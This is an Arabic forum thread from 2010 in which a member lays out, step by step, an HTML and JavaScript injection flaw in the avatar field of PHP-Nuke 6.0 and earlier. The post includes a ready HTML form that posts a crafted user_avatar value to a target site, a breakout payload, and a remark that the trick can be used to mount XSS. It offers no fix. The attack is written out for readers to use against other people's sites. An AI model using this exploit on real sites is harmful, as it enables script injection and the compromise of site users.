منتدى الشباب العربي

بحـث
 
 

نتائج البحث
 


Rechercher بحث متقدم

دخول

لقد نسيت كلمة السر



الان تصفح منتدانا باي لغة باللعالم

Browse 4-3rbshbaab.roo7.biz now in many languages


المواضيع الأخيرة
» صورة للشهيد محمد اسامة فروح
ثغرة في php nuke   Emptyالخميس أكتوبر 11, 2012 3:11 am من طرف حموده

» البيان الرابع لواء احرار الشمال
ثغرة في php nuke   Emptyالجمعة مارس 23, 2012 3:45 pm من طرف العميد

» البيان الثالث للواء احرا الشمال
ثغرة في php nuke   Emptyالجمعة مارس 23, 2012 3:27 am من طرف العميد

» الرئيس الاسد في جولة تفقدية ((( نهفات الحماصنة )))
ثغرة في php nuke   Emptyالخميس مارس 15, 2012 5:02 am من طرف العميد

» والد الشهيد محمد عباس يزف شهيده
ثغرة في php nuke   Emptyالخميس مارس 15, 2012 4:17 am من طرف العميد

» الشهيد ابراهيم محمد عباس اول شهداء لواء احرار الشمال
ثغرة في php nuke   Emptyالخميس مارس 15, 2012 4:15 am من طرف العميد

» اشتباكات اللواء في مدينة عزاز
ثغرة في php nuke   Emptyالخميس مارس 15, 2012 4:10 am من طرف العميد

» البيان الثاني للواء احرار الشمال
ثغرة في php nuke   Emptyالخميس مارس 15, 2012 4:06 am من طرف العميد

» البيان الاول للواء احرار الشمال
ثغرة في php nuke   Emptyالخميس مارس 15, 2012 3:55 am من طرف العميد

اهلا بك معنااختر منطقتك الزمنية
كن احد المناصرين لنبيك واكسب الاجر

أهلا وسهلا بك زائرنا الكريم, أنت لم تقم بتسجيل الدخول بعد! يشرفنا أن تقوم بالدخول أو التسجيل إذا رغبت بالمشاركة في المنتدى

ثغرة في php nuke

اذهب الى الأسفل  رسالة [صفحة 1 من اصل 1]

1f ثغرة في php nuke في الأحد ديسمبر 05, 2010 1:19 am

amer


عضو مثابر
عضو مثابر
فيه ثغره في ال php nuke حبيت اقولكم عليها ..الثغره دي تتيح لك تنفيذ اكواد الهتمل و الجافا بدل مكان الصوره الشخصيه .......

انا عارف انكم اول ما تقروا السطر الاول اكيد اغلبكم حيشتمني باكثر الالفاظ اباحه - بس عادي انا متعود - و يقول ايه ده باه هو مدخلنا هنا عشان يقولنا تنفيذ اكواد هتمل و جافا بدل الصوره الشخصيه ؟؟؟!!!! بس ؟؟؟!!! اما عبيط اوي !!!

لكن في اخر الموضوع حقولكم ممكن تعملوا بيها ايه .....

المهم ان الثغره كالتالي : ( ساحاول اني اعمل زي مواقع السيكيوريتي المحترمه لم تيجي تعرض ثغره )

الاصدارات المصابه :

PHP Nuke versionh 6.0 و الاقل منها

الاستخدام :

تستخدم كما قلت في تنفيذ اكواد الهتمل و الجافا سكريبت من خلال مكان صورهم الشخصيه.



ملخص عام للثغره:

اي مستخدم عندم يقوم بالتسجيل في المجله فانه يطالب باختيار صوره شخصيه و ذلك من خلال مجموعه من الصور الموجوده في المجلد هذا /images/forum/avatars ....

عندئذ تقوم المجله بوضع اسم الصوره في الداتا بيز .. و لكنها لا تقوم بوضع اي كود اي انه اذا استطاع اي يوزر ان يحصل على كود فورم المجله و استطاع ان يغير صندوق اختيار الصوره الشخصيه الى صندوق text عادي ..اذن اعتقد انه ممكن ان يكتب كود الهتمل اللي هوه عايزه !!!!

الاكسبلويت:

اولا عليك ن تقوم بالتسجيل في المجله و الدخول بعد ذلك و الذهاب الى صفحه Your Account و منها الذهاب الى صفحه Your Info بعد ذلك عليك باظهار سورس كود الصفحه من خلال view source و البحث عن كلمه uid

لازم تلاقي حاجه زي كده :

<input type="hidden" name="uid" value="2111">


كده يبقى انت عرفت رقم الاي دي اللي هوه في المثال كان 2111 ...

عليك بعد ذلك نك تحفظ الكود ده في النوت باد و تسميه اي اسم بامتداد html مع ملاحظه تغيير [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الى عنوان المجله الهدف ......:

<!-- START CODE --!>
<form name="Register"
action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">


<b>Code ('">[code]<b ')</b><input type="text"
name="user_avatar" size="30"
maxlength="30"><br><br>


<b>Username</b><input type="text" name="uname" size="30"

maxlength="255"><br><b>User ID:<input type="text"
name="uid"
size="30"><input type="hidden" name="op"
value="saveuser"><input
type="submit" value="Save Changes"></form>
<!-- END CODE --!>



و الان عليك تشغيل ملف الhtml هذا .. اول خانه عليك كتابه الكود المطلووب تنفيذه مع مراعاه انه يجب ن يبدأ بالعلامه :

">

و ممكن ينتهي بالعلامه

<b

حتى لا تجد اي مشاكل في الكود عند العرض ...ضع بعد كده اسم اليوزر و رقم الاي دي و بعدين submit سوف تجد نفسك في صفحه Your Account الخاصه بك ..و كده الكود تم تشغيله !!!!

مثال للي ممكن تكتبه مثلا :

"><h1>TESTING</h1><b

طبعا ده حيطبع الكلمه TESTING مكان صورتك الشخصيه ....!!

خلي بالك ان فيه مسافه بعد العلامه

"<b

خلي بالك منها والا سوف تجد بروكين كود ..

اقصى حد للكود اللي ممكن انك تشغله هو 30 كراكتر ....

اللي انا كنت عايز اقوله انك ممكن تنفذ ثغرات xss او اي حاجه انت مش عارف تنفذها بسبب اغلاق كود الهتمل اياه =) لمزيد من المعلومات راجع الدرس هذا كمثال ليس اكثر ؟؟

الحل :

لسه و الله !!!!

و السلام عليكم و رحمه الله و بركاته...

معاينة صفحة البيانات الشخصي للعضو

2f رد: ثغرة في php nuke في الأحد ديسمبر 05, 2010 11:46 pm

العميد

العميد
عضو متميز
عضو متميز
اتمنى من الله ان يوفق المسلمين فيما يحب ويرضا


_________________
الله محيي الجيش الحر

ثغرة في php nuke   Nbvnb
معاينة صفحة البيانات الشخصي للعضو

الرجوع الى أعلى الصفحة  رسالة [صفحة 1 من اصل 1]

صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى